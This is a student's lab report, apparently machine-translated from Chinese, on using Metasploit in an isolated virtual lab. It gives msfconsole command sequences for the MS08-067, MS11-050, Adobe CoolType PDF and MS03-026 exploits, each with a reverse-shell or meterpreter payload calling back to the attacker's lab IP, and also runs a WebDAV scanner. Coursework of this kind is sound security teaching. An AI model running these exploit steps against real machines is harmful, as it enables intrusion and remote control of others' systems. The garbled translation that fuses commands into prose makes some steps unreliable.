20155229 "Network Countermeasures Technology" Exp5: MSF Basic Application

Experimental content

The goal of this practice is to master the basic application methods of metasploit, focusing on the ideas of three commonly used attack methods. Specifically need to complete:

• An active attack practice, such as MS08-067;

• An attack against browsers, such as ms11-050;

• A client-side attack, such as Adobe;

• Successfully applied any of the auxiliary modules.

• The above four small practices are not limited to the above examples, and at least one of them is required to be different from all other students.

---

Active Attack Practice MS08-067 Vulnerability

• msfconsoleenter msf console
• search ms08_067Check out this vulnerability

• use exploit/windows/smb/ms08_067_netapiuse this exploit

• show payloadsBacklink attack payload

• set payload generic/shell_reverse_tcptcp reverse connection

• set LHOST 192.168.126.128Attacker's ip address

• set LPORT 5229attack port

• set RHOST 192.168.126.136The ip address of the target machine

• set target 0Select target system type

• exploitattack

• The following figure shows the successful attack

• ipconfigEnter the ip address of the target machine in kali

• Check the ip address of the target machine in XP, the two are exactly the same.

Browser Attacks ms11_050

• enter the msfconsoleconsole

• Enter use windows/browser/ms11_050_mshtml_cobjectelementthe command to use the ms11_050 vulnerability

• Enter set payload windows/meterpreter/reverse_httpthe command to use http reverse connection

• Set the IP address of kaliset LHOST 192.168.126.128
• set portset LPORT 5229
• set resource identifier pathset URIPATH fyh5229

• attackexploit

Enter the URL of the LOCAL IP in the above picture into the IE browser in WIN XP, and 遇到问题需要关闭the window that appears. At the same time, 360 has given a notice that it needs to be repaired.

• But back to KALI to establish a session, IE browser has closed the page.

• I set the browser's options, set the security level to the lowest level, and enabled the plug-in settings, but the session connection still failed. . .

will look into this

---

Client-Side Attack Adobe

• Enter msfconsoleinto the msf console

• Enter to search adobefind vulnerabilities related to adobe

• I chosewindows/fileformat/adobe_cooltype_sing

• Enter set payload windows/meterpreter/reverse_tcpthe reverse connection using tcp

• Set IP address and port number
• Enter set FILENAME 5229.pdfcommand to generate pdf file

• attack

• The figure below shows the sign of successfully generating a PDF file.

• According to the storage path, find the PDF file and put it into the target machine.
• But I couldn't find the file after searching for a long time. Later, as shown in the figure below, select 显示隐藏文件it, and then I can find the hidden folder.

• I first copied the modified file into my host, and it was immediately deleted by 360.

• enter monitor mode in msf
• set payload windows/meterpreter/reverse_tcptcp reverse connection
• set ip address and port number
• attack

• Open the 5229.pdf file on XP, and the attack is successful in kali

• Enter ipconfig, the ip address of xp is displayed, which proves that the attack is correct.

---

Auxiliary module webdav

webdav: WebDAV is a communication protocol based on the HTTP 1.1 protocol. Because WebDAV is integrated with Windows XP and IIS, it has the security features provided by both. These include IIS permissions specified in the Internet Information Services snap-in and discretionary access control lists (DACLs) in the NTFS file system.

• enter msf console
• Use the show auxiliarycommand to display all auxiliary modules and their purpose.

• choosescanner/http/webdav_scanner
• show optionsView configuration options for this vulnerability

• The ip address and thread of kali are set
• attack

• The result of the attack is shown in the figure above, but the target machine does not have IIS installed.
• Refer to how to enable IIS to install IIS on Windows XP system

• Allow webdav, attack again, will get [*] 192.168.126.128 (Microsoft-IIS/6.0) has WEBDAV ENABLEDthe message.

RPC interface long hostname remote buffer overflow vulnerability (MS03-026)

• Remote Procedure Call (RPC) is a remote procedure call protocol used by the Windows operating system. RPC provides an inter-process interactive communication mechanism that allows a program running on a computer to seamlessly execute code on a remote system.

• useuse exploit/windows/dcerpc/ms03_026_dcom
• use set payload windows/meterpreter/reverse_tcptcp reverse connection

• show options View configuration options for this vulnerability

• set LHOST 192.168.126.128 Set the host ip

• set RHOST 192.168.126.137 Set the ip of the rebound shell

• The attack is successful, but there is no way to establish a session.

"无会话已创建"消息发生的情况：

① 使用的漏洞利用对所选择的目标不起作用。可以
是一个不同版本的漏洞，或目标配置有问题。


② 您使用的漏洞利用被配置为使用不创建的有效载荷 
互动会话。

• According to the above prompts, show optionsthe display Windows NT SP3-6a/2000/XP/2003 Universalcan be used, and the virtual machine of its own is detected, and the virtual machine of Microsoft Windows XP Professionalthe Microsoft Windows XP Professional SP2two versions cannot be used to establish a session.

• Checked the exploited vulnerabilities, no errors.

• Because the vulnerability is related to the RPC protocol and remote, I opened the WindowsXP system security settings in the virtual machine respectively: turn off remote assistance and services (turn off the closed place) and what is the 'RPC server unavailable' displayed on XP Meaning but still unable to establish a session.

• Well, I really can't solve this problem. . .

---

Post-experiment questions and answers

• Explain what is exploit, payload, encode in your own words.

• exploitThe English translation is 利用that hackers use loopholes to attack computers. There are loopholes that may not be exploited, but there must be loopholes that can be exploited.
• payload:Payload. Usually when transmitting data, in order to make the data transmission more reliable, the original data should be transmitted in batches, and certain auxiliary information should be added to the head and tail of each batch of data, and the original data is the payload.

• encode: Encoder, used to encode the payload to protect the payload from being discovered

---

Experiment summary and experience

This experiment is actually not difficult, but it does not mean that every attack can be successful, and it does not mean that every attack can successfully establish a session. I have done several experiments, and only a few of them succeeded, and I did not write down some of the failures.

Although most of them failed, there is no doubt that this experiment has learned a lot of knowledge by finding the loopholes in the data and learning by myself.